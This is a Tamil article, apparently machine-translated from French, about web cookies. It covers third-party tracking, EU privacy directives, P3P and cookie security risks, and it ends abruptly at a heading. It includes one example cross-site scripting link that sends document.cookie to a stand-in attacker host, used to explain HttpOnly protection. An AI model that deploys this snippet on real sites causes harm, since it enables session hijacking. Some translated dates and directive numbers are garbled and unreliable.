• குக்கீகளை முழுமையாக இயக்கவும் அல்லது முடக்கவும், இதனால் அவை தொடர்ந்து ஏற்றுக்கொள்ளப்படும் அல்லது தடுக்கப்படும்.
• உலாவியின் முகவரிப் பட்டியில் javascript: alert(document.cookie) ஐ உள்ளிடுவதன் மூலம், கொடுக்கப்பட்ட பக்கத்தில் செயலில் உள்ள குக்கீகளைப் பார்க்க பயனரை அனுமதிக்கவும். சில உலாவிகள் தற்போது உலாவியில் சேமிக்கப்பட்டுள்ள குக்கீகளைப் பார்க்கவும் தேர்ந்தெடுத்து நீக்கவும் கூடிய பயனருக்கான குக்கீ மேலாளரைக் கொண்டிருக்கின்றன.

பெரும்பாலான உலாவிகள் குக்கீகளை உள்ளடக்கிய தனிப்பட்ட தரவை முழுமையாக நீக்க அனுமதிக்கின்றன. குக்கீ அனுமதிகளைக் கட்டுப்படுத்த கூடுதல் தொகுதிகள் உள்ளன.

தனியுரிமை மற்றும் மூன்றாம் தரப்பு குக்கீகள்

இந்த கற்பனையான உதாரணத்தில், ஒரு விளம்பர நிறுவனம் இரண்டு இணையதளங்களில் பேனர்களை வைத்துள்ளது. பேனர்களை அதன் சர்வர்களில் ஹோஸ்ட் செய்து மூன்றாம் தரப்பு குக்கீகளைப் பயன்படுத்துவதன் மூலம், இந்த இரண்டு தளங்கள் மூலம் பயனரின் வழிசெலுத்தலை விளம்பர நிறுவனம் கண்காணிக்க முடியும்.

குக்கீகள் இணைய பயனர்களின் தனியுரிமை மற்றும் அநாமதேயத்திற்கு முக்கியமான தாக்கங்களைக் கொண்டுள்ளன. குக்கீகளை அமைக்கும் சேவையகத்திற்கோ அல்லது அதே இணைய டொமைனைச் சேர்ந்த சேவையகத்திற்கோ மட்டுமே குக்கீகள் திருப்பி அனுப்பப்பட்டாலும், ஒரு இணையப் பக்கத்தில் மற்ற டொமைன்களைச் சேர்ந்த சர்வர்களில் சேமிக்கப்பட்ட படங்கள் அல்லது பிற கூறுகள் இருக்கலாம். இந்த வெளிப்புற கூறுகளை மீட்டெடுக்கும் போது அமைக்கப்பட்ட குக்கீகள் அழைக்கப்படுகின்றன மூன்றாம் தரப்பு குக்கீகள். தேவையற்ற பாப்-அப் விண்டோக்களின் குக்கீகள் இதில் அடங்கும்.

விளம்பர நிறுவனங்கள், அவர்கள் பார்வையிடும் வெவ்வேறு தளங்களில் பயனர்களைக் கண்காணிக்க மூன்றாம் தரப்பு குக்கீகளைப் பயன்படுத்துகின்றன. குறிப்பாக, ஒரு விளம்பர நிறுவனம் விளம்பரப் படங்கள் அல்லது டிராக்கிங் பிக்சலை வைத்துள்ள அனைத்துப் பக்கங்களிலும் ஒரு பயனரைக் கண்காணிக்க முடியும். பயனர் பார்வையிட்ட பக்கங்களைப் பற்றிய அறிவு, பயனரின் விளம்பர விருப்பங்களை குறிவைக்க விளம்பர நிறுவனம் அனுமதிக்கிறது.

மூன்றாம் தரப்பு குக்கீகளைப் பயன்படுத்தி பல்வேறு டொமைன்களில் கண்காணிப்பு செய்யப்படும்போது, ​​பயனர் சுயவிவரத்தை உருவாக்கும் திறன் தனியுரிமைப் படையெடுப்பு என்று சிலரால் கருதப்படுகிறது. இந்த காரணத்திற்காக, சில நாடுகளில் குக்கீ சட்டம் உள்ளது.

ஆன்லைன் மருந்து விளம்பரங்களைப் பார்க்கும் பயனர்களின் கணினிகளைக் கண்காணிக்க வெள்ளை மாளிகை மருந்துக் கொள்கை அலுவலகம் குக்கீகளைப் பயன்படுத்துகிறது என்று தெரியவந்ததை அடுத்து, அமெரிக்க அரசாங்கம் 2000 ஆம் ஆண்டில் குக்கீகளை வைப்பதில் கடுமையான விதிகளை அமல்படுத்தியது. 2002 ஆம் ஆண்டில், தனியுரிமை ஆர்வலர் டேனியல் பிராண்ட், CIA அதன் இணையதளங்களைப் பார்வையிட்ட கணினிகளில் தொடர்ந்து குக்கீகளை விட்டுச் சென்றதைக் கண்டுபிடித்தார். இந்த மீறல் குறித்து தெரிவிக்கப்பட்டதும், இந்த குக்கீகள் வேண்டுமென்றே அனுப்பப்படவில்லை என்று CIA அறிவித்து, அவற்றை அமைப்பதை நிறுத்தியது. டிசம்பர் 25, 2005 அன்று, மென்பொருள் புதுப்பித்தலின் காரணமாக பார்வையாளர்களின் கணினிகளில் தேசிய பாதுகாப்பு நிறுவனம் (NSA) இரண்டு தொடர்ச்சியான குக்கீகளை விட்டுச் சென்றதை பிராண்ட் கண்டுபிடித்தார். அறிவிக்கப்பட்ட பிறகு, NSA உடனடியாக குக்கீகளை முடக்கியது.

ஐக்கிய இராச்சியத்தில், தி குக்கீ சட்டம் “, மே 25, 2012 முதல் நடைமுறைக்கு வந்தது, தளங்கள் தங்கள் நோக்கங்களை அறிவிக்கக் கட்டாயப்படுத்துகிறது, இதனால் பயனர்கள் இணையத்தில் தடயங்களை விட்டுச் செல்ல விரும்புகிறீர்களா இல்லையா என்பதைத் தேர்வுசெய்ய அனுமதிக்கிறது. இதனால் அவர்கள் விளம்பர இலக்குகளில் இருந்து பாதுகாக்கப்படலாம். எனினும், படி பாதுகாவலர், இணைய பயனர்களின் ஒப்புதல் வெளிப்படையாக இருக்க வேண்டிய அவசியமில்லை; பயனர் ஒப்புதலின் விதிமுறைகளில் மாற்றங்கள் செய்யப்பட்டுள்ளன இவ்வாறு மறைமுகமாக குறிப்பிடப்பட்டுள்ளது.

தனியுரிமை குறித்த உத்தரவு 2002/58

உத்தரவு 202/58 தனியுரிமை மற்றும் மின்னணு தகவல் தொடர்பு, குக்கீகளைப் பயன்படுத்துவதற்கான விதிகளைக் கொண்டுள்ளது. குறிப்பாக, இந்த உத்தரவின் கட்டுரை 5, பத்தி 3, பயனரின் கணினியில் தரவை (குக்கீகள் போன்றவை) சேமிப்பது பின்வரும் சந்தர்ப்பங்களில் மட்டுமே செய்யப்பட வேண்டும்:

• தரவு எவ்வாறு பயன்படுத்தப்படுகிறது என்பது குறித்து பயனருக்குத் தெரிவிக்கப்படுகிறது;
• இந்த சேமிப்பக செயல்பாட்டை மறுக்கும் விருப்பம் பயனருக்கு வழங்கப்படுகிறது. இருப்பினும், தொழில்நுட்ப காரணங்களுக்காக தரவை சேமிப்பது இந்த சட்டத்திலிருந்து விலக்கு அளிக்கப்பட்டுள்ளது என்றும் இந்த கட்டுரை கூறுகிறது.

அக்டோபர் 2003 முதல் நடைமுறைப்படுத்தப்பட வேண்டும், இருப்பினும் டிசம்பர் 2004 இன் அறிக்கையின்படி இந்த உத்தரவு மிகவும் அபூரணமாக நடைமுறைக்கு வந்தது, இது சில உறுப்பு நாடுகள் (ஸ்லோவாக்கியா, லாட்வியா, கிரீஸ், பெல்ஜியம் மற்றும் லக்சம்பர்க்) இன்னும் மாற்றப்படவில்லை என்பதையும் சுட்டிக்காட்டியது. உள்நாட்டு சட்டத்தில் உத்தரவு.

29 இல் G2010 இன் கருத்தின்படி, இணைய பயனரின் வெளிப்படையான ஒப்புதலின் பேரில், நடத்தை சார்ந்த விளம்பர நோக்கங்களுக்காக குக்கீகளைப் பயன்படுத்துவதைக் குறிப்பிடும் இந்த உத்தரவு மிகவும் மோசமாகப் பயன்படுத்தப்படுகிறது. உண்மையில், பெரும்பாலான தளங்கள், "தொழில்நுட்ப" குக்கீகளுக்கு இடையே வேறுபாடு காட்டாமல், "குக்கீகளின்" பயன்பாட்டைப் பற்றிய தகவல்களைத் தெரிவிக்காமல், "குக்கீகளின்" பயன்பாட்டைத் தெரிவிக்கும் ஒரு எளிய "பேனருக்கு" தங்களைக் கட்டுப்படுத்திக் கொள்வதன் மூலம், கட்டளைக்கு இணங்காத வகையில் செய்கின்றன. "கண்காணிப்பு" குக்கீகள், அல்லது தொழில்நுட்ப குக்கீகளை (ஷாப்பிங் கார்ட் மேலாண்மை குக்கீகள் போன்றவை) பராமரிக்க விரும்பும் பயனருக்கு உண்மையான தேர்வை வழங்கவும் மற்றும் "கண்காணிப்பு" குக்கீகளை மறுக்கவும். உண்மையில், குக்கீகள் மறுக்கப்பட்டால், பல தளங்கள் சரியாகச் செயல்படாது, இது உத்தரவு 2002/58 அல்லது உத்தரவு 95/46 (தனிப்பட்ட தரவுப் பாதுகாப்பு) ஆகியவற்றுடன் இணங்கவில்லை.

உத்தரவு 2009/136/CE

இந்த உள்ளடக்கம் நவம்பர் 2009, 136 தேதியிட்ட உத்தரவு 25/2009/EC ஆல் புதுப்பிக்கப்பட்டது, அதில் "தகவலைச் சேமிப்பது அல்லது ஏற்கனவே சேமித்து வைத்திருக்கும் தகவல்களுக்கான அணுகலைப் பெறுவது, சந்தாதாரர் அல்லது பயனரின் முனையக் கருவியில் மட்டுமே அனுமதிக்கப்படுகிறது. சந்தாதாரர் அல்லது பயனர் தனது ஒப்புதலைப் பெற்ற பிறகு, 95/46/EC உத்தரவுக்கு இணங்க, செயலாக்கத்தின் நோக்கங்கள் குறித்து மற்றவர்களுக்கு இடையே தெளிவான மற்றும் முழுமையான தகவலை அளித்துள்ளார். எனவே புதிய உத்தரவு இணைய பயனரின் கணினியில் குக்கீகளை வைப்பதற்கு முந்தைய கடமைகளை வலுப்படுத்துகிறது.

ஆணையின் ஆரம்பக் கருத்தாக்கங்களில், ஐரோப்பிய சட்டமன்ற உறுப்பினர் குறிப்பிடுகிறார்: "தொழில்நுட்ப ரீதியாக சாத்தியமான மற்றும் பயனுள்ள, உத்தரவு 95/46/EC இன் தொடர்புடைய விதிகளுக்கு இணங்க, செயலாக்கம் தொடர்பாக பயனரின் ஒப்புதல் வெளிப்படுத்தப்படலாம். உலாவி அல்லது பிற பயன்பாட்டின் பொருத்தமான அமைப்புகளைப் பயன்படுத்துதல். ஆனால் உண்மையில், இன்றுவரை எந்த உலாவியும் அவசியமான தொழில்நுட்ப குக்கீகளை விருப்பமானவற்றிலிருந்து பிரிப்பதை சாத்தியமாக்கவில்லை, அவை பயனரின் விருப்பத்திற்கு விடப்பட வேண்டும்.

இந்த புதிய உத்தரவு ஜூலை 2012 இல் பெல்ஜிய எம்.பி.க்களால் மாற்றப்பட்டது. 2014 ஆம் ஆண்டு ஆய்வின்படி, எம்.பி.க்கள் கூட விண்ணப்பிக்க சிரமப்படுகிறார்கள் கட்டளையின் தடைகள்.

P3P

P3P விவரக்குறிப்பில் ஒரு சேவையகம் ஒரு தனியுரிமைக் கொள்கையைக் கூறுவதற்கான திறனை உள்ளடக்கியது, இது எந்த வகையான தகவலை சேகரிக்கிறது மற்றும் எந்த நோக்கத்திற்காக வரையறுக்கிறது. இந்தக் கொள்கைகளில் குக்கீகளைப் பயன்படுத்தி சேகரிக்கப்பட்ட தகவல்களின் பயன்பாடு அடங்கும் (ஆனால் அவை மட்டும் அல்ல). P3P இன் வரையறைகளின்படி, தனியுரிமைக் கொள்கைகளை பயனரின் விருப்பங்களுடன் ஒப்பிடுவதன் மூலம் அல்லது பயனரிடம் கேட்டு, சேவையகத்தால் அறிவிக்கப்பட்ட தனியுரிமைக் கொள்கையின் தனியுரிமை அறிக்கையை வழங்குவதன் மூலம் ஒரு உலாவி குக்கீகளை ஏற்கலாம் அல்லது நிராகரிக்கலாம்.

Apple Safari மற்றும் Microsoft Internet Explorer பதிப்புகள் 6 மற்றும் 7 உட்பட பல உலாவிகள் P3P ஐ ஆதரிக்கின்றன, இது மூன்றாம் தரப்பு குக்கீ சேமிப்பகத்தை ஏற்க வேண்டுமா என்பதை உலாவி தீர்மானிக்க அனுமதிக்கிறது. மூன்றாம் தரப்பு குக்கீகளை நிராகரிக்கவும், இணைய டொமைன்களுக்கான உலகளாவிய மற்றும் குறிப்பிட்ட பாதுகாப்பு சுயவிவரத்தை உருவாக்கவும் ஓபரா உலாவி பயனர்களை அனுமதிக்கிறது. Mozilla Firefox பதிப்பு 2 P3P ஆதரவை கைவிட்டது, ஆனால் அதை பதிப்பு 3 இல் மீண்டும் நிறுவியது.

பயனரின் இணைய அனுபவத்தை எதிர்மறையாக பாதிக்காமல், தனியுரிமையை அதிகரிக்கவும் விளம்பர கண்காணிப்பைக் குறைக்கவும் மூன்றாம் தரப்பு குக்கீகளை பெரும்பாலான உலாவிகள் தடுக்கலாம். பல விளம்பர நிறுவனங்கள் ஒரு விருப்பத்தை வழங்குகின்றன விலகவும் இலக்கு விளம்பரத்திற்கு, உலாவியில் ஒரு பொதுவான குக்கீயை அமைப்பதன் மூலம், இந்த இலக்கை செயலிழக்கச் செய்கிறது, ஆனால் அத்தகைய தீர்வு நடைமுறையில் பயனுள்ளதாக இல்லை, அது மதிக்கப்படும் போது, ​​ஏனெனில் இந்த பொதுவான குக்கீகள் பயனர் இந்த குக்கீகளை நீக்கியவுடன், விருப்பத்தை ரத்து செய்யும். வெளியே முடிவு.

குக்கீகளின் தீமைகள்

தனியுரிமை சிக்கல்களுக்கு கூடுதலாக, குக்கீகள் சில தொழில்நுட்ப குறைபாடுகளையும் கொண்டுள்ளன. குறிப்பாக, அவர்கள் எப்போதும் பயனர்களை துல்லியமாக அடையாளம் கண்டுகொள்வதில்லை, அதிக எண்ணிக்கையில், அவை பாதுகாப்புத் தாக்குதல்களுக்குப் பயன்படுத்தப்படும்போது, ​​அவை தளத்தின் செயல்திறனைக் குறைக்கலாம், மேலும் அவை பிரதிநிதி நிலைப் பரிமாற்றம், மென்பொருளின் கட்டடக்கலை பாணி ஆகியவற்றுடன் முரண்படுகின்றன.

துல்லியமற்ற அடையாளம்

கணினியில் ஒன்றுக்கும் மேற்பட்ட உலாவிகள் பயன்படுத்தப்பட்டால், அவை ஒவ்வொன்றிலும் எப்போதும் குக்கீகளுக்கான தனி சேமிப்பு அலகு இருக்கும். எனவே குக்கீகள் ஒரு நபரை அடையாளம் காணவில்லை, ஆனால் ஒரு பயனர் கணக்கு, கணினி மற்றும் இணைய உலாவி ஆகியவற்றின் கலவையாகும். எனவே, இந்த கணக்குகள், கணினிகள் அல்லது குக்கீகளின் பனோபிலியைக் கொண்ட உலாவிகளை யார் வேண்டுமானாலும் பயன்படுத்தலாம். இதேபோல், "இன்டர்நெட் கஃபேக்கள்" அல்லது கணினி ஆதாரங்களுக்கு இலவச அணுகலை வழங்கும் எந்த இடத்திலும் ஒரே பயனர் கணக்கு, கணினி மற்றும் உலாவியைப் பகிர்ந்து கொள்ளும் பல பயனர்களிடையே குக்கீகள் வேறுபடுவதில்லை.

ஆனால் நடைமுறையில், இந்த அறிக்கை பெரும்பாலான சந்தர்ப்பங்களில் தவறானதாக மாறிவிடும், ஏனெனில் இன்று ஒரு "தனிப்பட்ட" கணினி (அல்லது ஸ்மார்ட்போன் அல்லது டேப்லெட், இது மோசமானது) முக்கியமாக ஒரு தனி நபரால் பயன்படுத்தப்படுகிறது. நபர் "அதாவது" அடையாளம் காணப்படாவிட்டாலும் சேகரிக்கப்பட்ட தகவல்களின் அளவு மூலம் தனிப்பயனாக்கப்பட்ட இலக்கை அடைகிறது.

குக்கீகளின் திருட்டு

நெட்வொர்க்கில் உள்ள மற்றொரு கணினியால் குக்கீ திருடப்படலாம்.

சாதாரண செயல்பாட்டின் போது, ​​குக்கீகள் சேவையகத்திற்கும் (அல்லது அதே டொமைனில் உள்ள சேவையகங்களின் குழுவிற்கும்) பயனரின் கணினி உலாவிக்கும் இடையே திருப்பி அனுப்பப்படும். குக்கீகளில் முக்கியமான தகவல்கள் (பயனர்பெயர், அங்கீகாரத்திற்குப் பயன்படுத்தப்படும் கடவுச்சொல் போன்றவை) இருக்கக்கூடும் என்பதால், அவற்றின் மதிப்புகள் மற்ற கணினிகளுக்கு அணுகப்படக்கூடாது. குக்கீ திருட்டு என்பது அங்கீகரிக்கப்படாத மூன்றாம் தரப்பினரால் குக்கீகளை இடைமறிக்கும் செயலாகும்.

செஷன் ஹைஜாக்கிங் எனப்படும் தாக்குதலில் பாக்கெட் ஸ்னிஃபர் மூலம் குக்கீகள் திருடப்படலாம். அனுப்பும் மற்றும் பெறும் கணினிகளைத் தவிர (குறிப்பாக மறைகுறியாக்கப்பட்ட பொது வைஃபை இடத்தில்) இணையத்தில் போக்குவரத்தை இடைமறித்து படிக்க முடியும். இந்த டிராஃபிக்கில் எளிய HTTP நெறிமுறையைப் பயன்படுத்தி அமர்வுகளில் அனுப்பப்படும் குக்கீகள் அடங்கும். நெட்வொர்க் ட்ராஃபிக் குறியாக்கம் செய்யப்படாதபோது, ​​தீங்கிழைக்கும் பயனர்கள் "பேக்கெட் ஸ்னிஃபர்ஸ்" ஐப் பயன்படுத்தி நெட்வொர்க்கில் உள்ள பிற பயனர்களின் தகவல்தொடர்புகளைப் படிக்கலாம்.

HTTPS நெறிமுறையைப் பயன்படுத்தி பயனரின் கணினிக்கும் சேவையகத்திற்கும் இடையிலான இணைப்பை குறியாக்கம் செய்வதன் மூலம் இந்த சிக்கலைச் சமாளிக்க முடியும். ஒரு சர்வர் குறிப்பிடலாம் a பாதுகாப்பான கொடி குக்கீ அமைக்கும் போது; உலாவி அதை SSL இணைப்பு போன்ற பாதுகாப்பான வரியில் மட்டுமே அனுப்பும்.

எவ்வாறாயினும், பல தளங்கள், பயனர் அங்கீகாரத்திற்காக (அதாவது உள்நுழைவுப் பக்கம்) HTTPS மறைகுறியாக்கப்பட்ட தகவல்தொடர்புகளைப் பயன்படுத்தினாலும், பின்னர் செயல்திறன் காரணங்களுக்காக குறியாக்கம் செய்யப்படாத HTTP இணைப்புகள் மூலம் அமர்வு குக்கீகள் மற்றும் பிற தரவை சாதாரணமாக அனுப்புகின்றன. தாக்குபவர்கள் பிற பயனர்களின் குக்கீகளை இடைமறித்து, பொருத்தமான தளங்களில் ஆள்மாறாட்டம் செய்யலாம் அல்லது குக்கீ தாக்குதல்களில் அவற்றைப் பயன்படுத்தலாம்.

தளத்தில் ஸ்கிரிப்டிங்: சேவையகத்திற்கும் கிளையண்டிற்கும் இடையில் மட்டுமே பரிமாறிக்கொள்ள வேண்டிய குக்கீ மற்றொரு மூன்றாம் தரப்பினருக்கு அனுப்பப்படும்.

குக்கீகளைத் திருடுவதற்கான மற்றொரு வழி, ஸ்கிரிப்ட் தளங்கள் மற்றும் உலாவியே குக்கீகளை ஒருபோதும் பெறாத தீங்கிழைக்கும் சேவையகங்களுக்கு அனுப்ப வேண்டும். நவீன உலாவிகள் சேவையகத்திலிருந்து குறியீட்டின் தேடப்பட்ட பகுதிகளை செயல்படுத்த அனுமதிக்கின்றன. இயக்க நேரத்தில் குக்கீகள் அணுகப்பட்டால், அவற்றின் மதிப்புகள் அவற்றை அணுகாத சேவையகங்களுக்கு ஏதேனும் ஒரு வடிவத்தில் தெரிவிக்கப்படலாம். குக்கீகளை பிணையத்தில் அனுப்பும் முன் குறியாக்கம் செய்வது தாக்குதலைத் தடுக்க உதவாது.

இந்த வகையான இன்-சைட் ஸ்கிரிப்டிங் பொதுவாக HTML உள்ளடக்கத்தை இடுகையிட பயனர்களை அனுமதிக்கும் தளங்களில் தாக்குபவர்களால் பயன்படுத்தப்படுகிறது. HTML பங்களிப்பில் இணக்கமான குறியீட்டின் ஒரு பகுதியை ஒருங்கிணைப்பதன் மூலம், தாக்குபவர் மற்ற பயனர்களிடமிருந்து குக்கீகளைப் பெறலாம். திருடப்பட்ட குக்கீகளைப் பயன்படுத்தி அதே தளத்தில் இணைப்பதன் மூலம் இந்த குக்கீகளைப் பற்றிய அறிவைப் பயன்படுத்தலாம், இதனால் குக்கீகள் திருடப்பட்ட பயனராக அங்கீகரிக்கப்படும்.

இத்தகைய தாக்குதல்களைத் தடுப்பதற்கான ஒரு வழி HttpOnly கொடியைப் பயன்படுத்துவதாகும்; இது PHP இல் இன்டர்நெட் எக்ஸ்புளோரரின் பதிப்பு 6 முதல் அறிமுகப்படுத்தப்பட்ட ஒரு விருப்பமாகும், இது பதிப்பு 5.2.0 இலிருந்து அறிமுகப்படுத்தப்பட்டது, இது ஸ்கிரிப்ட்டுக்கு நெருக்கமான கிளையண்டிற்கு குக்கீயை அணுக முடியாததாக மாற்ற திட்டமிடப்பட்டுள்ளது. இருப்பினும், வலை உருவாக்குநர்கள் தங்கள் தள மேம்பாட்டில் இதைக் கருத்தில் கொள்ள வேண்டும், இதனால் அவர்கள் தளத்தில் ஸ்கிரிப்டிங்கிலிருந்து விடுபடுவார்கள்.

மற்றொரு பாதுகாப்பு அச்சுறுத்தல் தளத்தில் தேவை புனையப்படுகிறது.

அதிகாரப்பூர்வ தொழில்நுட்ப விவரக்குறிப்பு குக்கீகளை அவை உருவாக்கிய டொமைனில் உள்ள சேவையகங்களுக்கு மட்டுமே திருப்பி அனுப்ப அனுமதிக்கிறது. இருப்பினும், குக்கீகளின் மதிப்பை குக்கீ தலைப்புகளைத் தவிர வேறு வழிகளைப் பயன்படுத்தி மற்ற சேவையகங்களுக்கு அனுப்பலாம்.

குறிப்பாக, ஜாவாஸ்கிரிப்ட் போன்ற ஸ்கிரிப்டிங் மொழிகள் பொதுவாக குக்கீ மதிப்புகளை அணுக அனுமதிக்கப்படுகின்றன மற்றும் இணையத்தில் உள்ள எந்த சேவையகத்திற்கும் தன்னிச்சையான மதிப்புகளை அனுப்பும் திறன் கொண்டவை. இந்த ஸ்கிரிப்டிங் திறன், மற்ற பயனர்கள் பார்க்க HTML உள்ளடக்கத்தை இடுகையிட பயனர்களை அனுமதிக்கும் வலைத்தளங்களிலிருந்து பயன்படுத்தப்படுகிறது.

எடுத்துக்காட்டாக, example.com டொமைனில் செயல்படும் தாக்குபவர், அவர்கள் கட்டுப்படுத்தாத பிரபலமான வலைப்பதிவைச் சுட்டிக்காட்டும் பின்வரும் இணைப்பைக் கொண்ட கருத்தை இடுகையிடலாம்:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

மற்றொரு பயனர் இந்த இணைப்பைக் கிளிக் செய்யும் போது, ​​உலாவி குறியீட்டின் onclick பண்புக்கூறு பகுதியை இயக்குகிறது, எனவே அது document.cookie சரத்தை இந்தப் பக்கத்திற்குச் செயலில் உள்ள பயனர் குக்கீகளின் பட்டியலுடன் மாற்றுகிறது. எனவே, இந்த குக்கீகளின் பட்டியல் example.com சேவையகத்திற்கு அனுப்பப்படுகிறது, மேலும் தாக்குபவர் இந்த பயனரின் குக்கீகளை சேகரிக்க முடியும்.

குக்கீயை அமைக்கும் அதே டொமைனில் இருந்து ஸ்கிரிப்ட் வருவதால், இந்த வகையான தாக்குதலை பயனர் தரப்பில் கண்டறிவது கடினம், மேலும் மதிப்புகளை அனுப்பும் செயல்பாடு அந்த டொமைனால் அங்கீகரிக்கப்பட்டதாகத் தோன்றுகிறது. தீங்கிழைக்கும் குறியீட்டை வெளியிடுவதைத் தடுக்கும் கட்டுப்பாடுகளை வைப்பது இந்த வகையான தளத்தை இயக்கும் நிர்வாகிகளின் பொறுப்பு என்று கருதப்படுகிறது.

குக்கீகள் HttpOnly கொடியுடன் அனுப்பப்பட்டிருந்தால், JavaScript போன்ற கிளையன்ட் பக்க நிரல்களுக்கு நேரடியாகத் தெரியவில்லை. சேவையகத்தின் பார்வையில், ஒரே வித்தியாசம் என்னவென்றால், செட்-குக்கீ ஹெடரின் வரிசையில் HttpOnly என்ற சரம் கொண்ட புதிய புலம் சேர்க்கப்பட்டுள்ளது:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

உலாவி அத்தகைய குக்கீயைப் பெறும்போது, ​​​​பின்வரும் HTTP பரிமாற்றத்தில் அதை வழக்கமாகப் பயன்படுத்த வேண்டும், ஆனால் கிளையன்ட் பக்கத்தில் செயல்படுத்தப்பட்ட ஸ்கிரிப்ட்களுக்கு அதைக் காட்டாமல். HttpOnly கொடி எந்த அதிகாரப்பூர்வ தொழில்நுட்ப விவரக்குறிப்பின் பகுதியாக இல்லை, மேலும் அனைத்து உலாவிகளிலும் செயல்படுத்தப்படாது. XMLHTTPRequest முறை மூலம் அமர்வு குக்கீகளைப் படிப்பதையும் எழுதுவதையும் தடுக்க தற்போது எந்த வழியும் இல்லை என்பதை நினைவில் கொள்ளவும்.

உள்ளடக்கத்தை மாற்றியமைத்தல்: தாக்குபவர் தவறான குக்கீயை சேவையகத்திற்கு அனுப்புகிறார், இது சர்வரால் அனுப்பப்பட்ட செல்லுபடியாகும் குக்கீயிலிருந்து உருவாக்கப்பட்டது.

குக்கீகளை மாற்றுதல்

குக்கீகளை சேமித்து, சேவையகத்திற்கு மாற்றாமல் திருப்பி அனுப்ப வேண்டும் என்றவுடன், தாக்குபவர், குக்கீகளை மீண்டும் சேவையகத்திற்கு அனுப்பும் முன் அவற்றின் மதிப்பை மாற்றியமைக்கலாம். எடுத்துக்காட்டாக, ஒரு குக்கீயில் ஸ்டோரின் ஷாப்பிங் கார்ட்டில் வைக்கப்பட்டுள்ள பொருட்களுக்கு பயனர் செலுத்த வேண்டிய மொத்த மதிப்பு இருந்தால், இந்த மதிப்பை மாற்றினால், தொடக்க விலையை விட குறைவாக தாக்குபவர்களிடம் கட்டணம் வசூலிக்கும் அபாயம் சர்வர்க்கு ஏற்படும். குக்கீகளின் மதிப்பை மாற்றியமைக்கும் செயல்முறை அழைக்கப்படுகிறது குக்கீ விஷம் மற்றும் குக்கீ திருட்டுக்குப் பிறகு தாக்குதலை தொடர்ந்து செய்ய பயன்படுத்தலாம்.

குக்கீ ஓவர்ரைடு முறையில், தாக்குபவர் உலாவிக் கோளாறைப் பயன்படுத்தி, தவறான குக்கீயை சர்வருக்கு அனுப்புகிறார்.

இருப்பினும், பெரும்பாலான இணையதளங்கள் ஒரு அமர்வு ஐடியை மட்டுமே சேமிக்கின்றன - அமர்வு பயனரை அடையாளம் காணப் பயன்படுத்தப்படும் தோராயமாக உருவாக்கப்பட்ட தனித்துவமான எண் - குக்கீயில், மற்ற எல்லா தகவல்களும் சேவையகத்தில் சேமிக்கப்படும். இந்த வழக்கில், இந்த சிக்கல் பெரும்பாலும் தீர்க்கப்படுகிறது.

வலைத்தளங்களுக்கு இடையே குக்கீ கையாளுதல்

ஒவ்வொரு தளத்திற்கும் அதன் சொந்த குக்கீகள் இருக்கும் என்று எதிர்பார்க்கப்படுகிறது, எனவே ஒரு தளம் மற்றொரு தளத்துடன் தொடர்புடைய குக்கீகளை மாற்றவோ அல்லது உருவாக்கவோ முடியாது. இணைய உலாவி பாதுகாப்பு குறைபாடு தீங்கிழைக்கும் தளங்கள் இந்த விதியை மீற அனுமதிக்கும். அத்தகைய குறைபாட்டை சுரண்டுவது பொதுவாக குறிப்பிடப்படுகிறது குறுக்கு தளத்தில் சமையல். இத்தகைய தாக்குதல்களின் நோக்கம் அமர்வு ஐடி திருட்டு.

பயனர்கள் இணைய உலாவிகளின் சமீபத்திய பதிப்புகளைப் பயன்படுத்த வேண்டும், இதில் இந்த பாதிப்புகள் கிட்டத்தட்ட அகற்றப்படுகின்றன.

கிளையன்ட் மற்றும் சர்வர் இடையே மோதல் நிலை

குக்கீகளின் பயன்பாடு வாடிக்கையாளரின் நிலைக்கும் குக்கீயில் சேமிக்கப்பட்ட நிலைக்கும் இடையே ஒரு முரண்பாட்டை உருவாக்கலாம். பயனர் குக்கீயைப் பெற்று, உலாவியின் "பின்" பொத்தானைக் கிளிக் செய்தால், உலாவியின் நிலை பொதுவாக இந்த கையகப்படுத்துதலுக்கு முன்பு இருந்ததைப் போல இருக்காது. எடுத்துக்காட்டாக, ஆன்லைன் ஸ்டோரின் கூடை குக்கீகளைப் பயன்படுத்தி உருவாக்கப்பட்டால், பயனர் உலாவி வரலாற்றிற்குத் திரும்பும்போது கூடையின் உள்ளடக்கங்கள் மாறாது: பயனர் தனது கூடையில் ஒரு கட்டுரையைச் சேர்க்க ஒரு பொத்தானை அழுத்தி "திரும்பவும்" என்பதைக் கிளிக் செய்தால் "பொத்தான், கட்டுரை இதில் உள்ளது. கட்டுரையைச் சேர்ப்பதை நிச்சயமாக ரத்து செய்ய விரும்பும் பயனரின் நோக்கமாக இது இருக்காது. இது நம்பகத்தன்மையின்மை, குழப்பம் மற்றும் பிழைகளுக்கு வழிவகுக்கும். எனவே வலை உருவாக்குநர்கள் இந்த சிக்கலைப் பற்றி அறிந்திருக்க வேண்டும் மற்றும் இதுபோன்ற சூழ்நிலைகளைக் கையாளுவதற்கான நடவடிக்கைகளை செயல்படுத்த வேண்டும்.

குக்கீ காலாவதியாகும்

தொடர்ச்சியான குக்கீகள், தனியுரிமை பாதுகாப்பு நிபுணர்களால் விரைவில் காலாவதியாகாததால் விமர்சிக்கப்பட்டது, இதன் மூலம் பயனர்களைக் கண்காணிக்கவும், காலப்போக்கில் அவர்களின் சுயவிவரத்தை உருவாக்கவும் வலைத்தளங்களை அனுமதிக்கிறது. குக்கீகளின் இந்த அம்சம் அமர்வு கடத்தல் சிக்கலின் ஒரு பகுதியாகும், ஏனெனில் திருடப்பட்ட தொடர்ச்சியான குக்கீயானது கணிசமான காலத்திற்கு ஒரு பயனரை ஆள்மாறாட்டம் செய்ய பயன்படுத்தப்படலாம்.

மேலும் படிக்க: GAFAM: அவர்கள் யார்? அவர்கள் ஏன் (சில நேரங்களில்) மிகவும் பயமாக இருக்கிறார்கள்?

குக்கீகளுக்கு மாற்று

குக்கீகளைப் பயன்படுத்திச் செய்யக்கூடிய சில செயல்பாடுகள் குக்கீகளைத் தவிர்த்து அல்லது நீக்கப்பட்ட குக்கீகளை மீண்டும் உருவாக்கும் பிற வழிமுறைகளைப் பயன்படுத்தியும் செய்யப்படலாம், இது குக்கீகளை விட அதே வழியில் தனியுரிமைச் சிக்கல்களை உருவாக்குகிறது (அல்லது சில நேரங்களில் கண்ணுக்குத் தெரியாததால்)

ஐபி முகவரி

